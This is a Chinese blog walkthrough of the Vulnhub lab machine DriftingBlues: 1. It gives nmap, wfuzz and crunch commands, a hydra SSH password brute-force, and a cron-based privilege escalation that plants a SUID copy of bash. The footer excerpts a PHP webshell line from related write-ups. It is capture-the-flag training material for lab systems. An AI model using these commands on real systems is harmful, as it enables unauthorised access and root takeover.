首页 > 其他分享 >Vulnhub: DriftingBlues: 1靶机

Vulnhub: DriftingBlues: 1靶机

时间:2023-08-25 19:22:07浏览次数:75  
标签:tmp 111.215 DriftingBlues 192.168 Vulnhub 靶机 txt bash ssh

kali:192.168.111.111

靶机:192.168.111.215

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.215

image

80端口首页源码

image

image

访问noteforkingfish.txt,发现为Ook!加密的密文

image

解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/services/ook

image

网站首页中的邮件地址的域名:driftingblues.box

image

爆破子域名

wfuzz -H 'HOST: FUZZ.driftingblues.box' -u http://192.168.111.215 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 7710 --hc 400 -c

image

image

查看子域的robots.txt提示ssh_cred.txt

image

ssh密码为1mw4ckyyucky最后加一位数字

image

生成密码字典

crunch 13 13 -t 1mw4ckyyucky% >> pass.txt

image

利用之前提示的用户eric爆破ssh

hydra -l eric -P ./pass.txt 192.168.111.215 -s 22 ssh -t 64

image

提权

pspy64收集到定时任务

image

/var/backups/backup.sh内容

image

在/tmp目录下创建emergency文件

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> /tmp/emergency
chmod 777 emergency
/tmp/bash -p

image

flag

image

标签:tmp,111.215,DriftingBlues,192.168,Vulnhub,靶机,txt,bash,ssh
From: https://www.cnblogs.com/ctostm/p/17657772.html

相关文章

  • Vulnhub: DOUBLE: 1靶机
    kali:192.168.111.111靶机:192.168.111.209信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.209目标80端口sendcommand.php页面源码写入webshell<?phpsystem($_GET["cmd"]);?>执行命令http://192.168.111.209/production/sendcommand......
  • 0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权
    0×03Vulnhub靶机渗透总结之KIOPTRIX:LEVEL1.2(#3)......
  • Vulnhub: ICMP: 1靶机
    kali:192.168.111.111靶机:192.168.111.208信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20880端口的cms为Monitorr1.7.6m搜索发现该版本的cms存在远程代码执行searchsploitmonitorr漏洞利用nc本地监听,再执行exppython348980.pyh......
  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 靶机 red hat enterprise linux 从收集到提权
    前言:时间2022年5月22日,在B/S架构上通过用户名dus2进行密码爆破后得到了dus2,拿到了普通用户的shell(权限很低),最终目的拿到root的shell来破环整个服务器。linux提权思路归纳   首先开始信息收集,登陆普通用户dsu2       uname-a                    ......
  • DC-9靶机
    靶机下载地址:http://www.five86.com/downloads/DC-9.zip1.查看kali靶机ip2.nmap192.168.137.0/24     nmap扫描同一网络段的靶机ip地址3.访问靶机192.168.137.154   访问80端口4.查看网站内容信息,在DisplayallRecords里有一些用户信息第三个Search,搜索拿......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......
  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......